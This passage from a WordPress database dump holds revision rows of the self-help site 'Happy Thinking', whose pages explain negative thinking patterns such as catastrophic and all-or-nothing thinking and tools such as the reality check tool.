approach can be to just make it a habit at an easy-to-remember time of the day, such as when getting into bed in the evening.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As one regularly uses the gratitude tool, one will find that oneâ€™s mind will look at the world in a less negative manner.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By the way, I am very grateful that you are visiting this website! I feel thankful that I have the opportunity to share my thoughts with you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/conclusion/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Gratitude tool', '', 'inherit', 'closed', 'closed', '', '1664-revision-v1', '', '', '2023-06-06 08:38:49', '2023-06-06 08:38:49', '', 1664, 'https://www.happythinking.com/?p=1744', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1745, 1, '2023-06-06 17:02:01', '2023-06-06 17:02:01', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-06 17:02:01', '2023-06-06 17:02:01', '', 88, 'https://www.happythinking.com/?p=1745', 0, 'revision', '', 0),
(1747, 1, '2023-06-06 18:51:17', '2023-06-06 18:51:17', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-06 18:51:17', '2023-06-06 18:51:17', '', 1034, 'https://www.happythinking.com/?p=1747', 0, 'revision', '', 0),
(1947, 1, '2023-06-21 17:22:51', '2023-06-21 17:22:51', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with negative thinking patterns. A common feature of negative thinking patterns is that often they are negative because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination. Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the negative thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ Let us continue with our example from the previous section, where Jayâ€™s partner was only ten minutes late returning home from work and he was having the negative thought, â€œShe must have met with a terrible road traffic accidentâ€. Jay first uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself.&nbsp; He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. There are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, he realises that he has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Jayâ€™s negative thought dies away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Jayâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Jayâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined negative thought would have caused him to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Jay uses the reality check tool, his partner walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the negative thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the negative thought is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with negative thoughts, there will be little or no evidence to support it. Once one realises that, the negative thought should fade away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-06-21 17:22:51', '2023-06-21 17:22:51', '', 1655, 'https://www.happythinking.com/?p=1947', 0, 'revision', '', 0),
(1749, 1, '2023-06-06 18:55:32', '2023-06-06 18:55:32', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-06 18:55:32', '2023-06-06 18:55:32', '', 1034, 'https://www.happythinking.com/?p=1749', 0, 'revision', '', 0),
(1752, 1, '2023-06-06 18:59:29', '2023-06-06 18:59:29', '<!-- wp:paragraph -->\n<p>In our day-to-day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to negative thinking patterns in them. I will now explain one such negative thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss negative thinking patterns is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became negative when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view. &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-06-06 18:59:29', '2023-06-06 18:59:29', '', 1620, 'https://www.happythinking.com/?p=1752', 0, 'revision', '', 0),
(1751, 1, '2023-06-06 18:57:50', '2023-06-06 18:57:50', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns, by discussing one that psychologists call the â€œnegativity effectâ€. This is a common type of negative thinking pattern and is a very important one to understand as it may, in some, contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone). Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus almost fully on the lost mobile phone, while ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking is negative because it makes the situation worse than it needs to be, as when one minimises positive events, they donâ€™t help to reduce the emotional impact of negative events. A more â€œhelpfulâ€ way to think would have been to see both the negative and positive events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a lion''s tail. If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a lion''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst lions and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the negativity effect type of negative thinking pattern.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-06 18:57:50', '2023-06-06 18:57:50', '', 1616, 'https://www.happythinking.com/?p=1751', 0, 'revision', '', 0),
(1753, 1, '2023-06-06 19:01:06', '2023-06-06 19:01:06', '<!-- wp:paragraph -->\n<p>As mentioned previously, negative thinking patterns often involve ways of thinking that distort how things really are. The negative thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, one may develop a thinking pattern that involves one thinking in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this thinking, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme.</p>\n<!-- 